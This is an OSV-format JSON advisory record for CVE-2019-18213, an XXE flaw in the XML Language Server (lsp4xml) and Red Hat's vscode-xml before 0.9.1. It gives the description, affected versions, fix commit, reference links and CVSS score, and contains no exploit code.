{"id":"CVE-2019-18213","details":"XML Language Server (aka lsp4xml) before 0.9.1, as used in Red Hat XML Language Support (aka vscode-xml) before 0.9.1 for Visual Studio and other products, allows XXE via a crafted XML document, with resultant SSRF (as well as SMB connection initiation that can lead to NetNTLM challenge/response capture for password cracking). This occurs in extensions/contentmodel/participants/diagnostics/LSPXMLParserConfiguration.java.","modified":"2026-04-10T04:16:35.554465Z","published":"2019-10-23T22:15:10.943Z","references":[{"type":"WEB","url":"https://github.com/angelozerr/lsp4xml/"},{"type":"ADVISORY","url":"https://marketplace.visualstudio.com/items?itemName=redhat.vscode-xml"},{"type":"ADVISORY","url":"https://github.com/angelozerr/lsp4xml/blob/master/CHANGELOG.md#others"},{"type":"FIX","url":"https://github.com/angelozerr/lsp4xml/pull/566"},{"type":"FIX","url":"https://github.com/redhat-developer/vscode-xml/"},{"type":"EVIDENCE","url":"https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/eclipse-lemminx/lemminx","events":[{"introduced":"0"},{"fixed":"bfbd50a13179fb3caed27655564a9202c2e86c72"}],"database_specific":{"versions":[{"introduced":"0"},{"fixed":"0.9.1"}]}}],"versions":["0.3.0","0.4.0","0.5.0","0.5.1","0.6.0","0.7.0","0.9.0","v0.0.1","v0.0.2"],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2019-18213.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}]}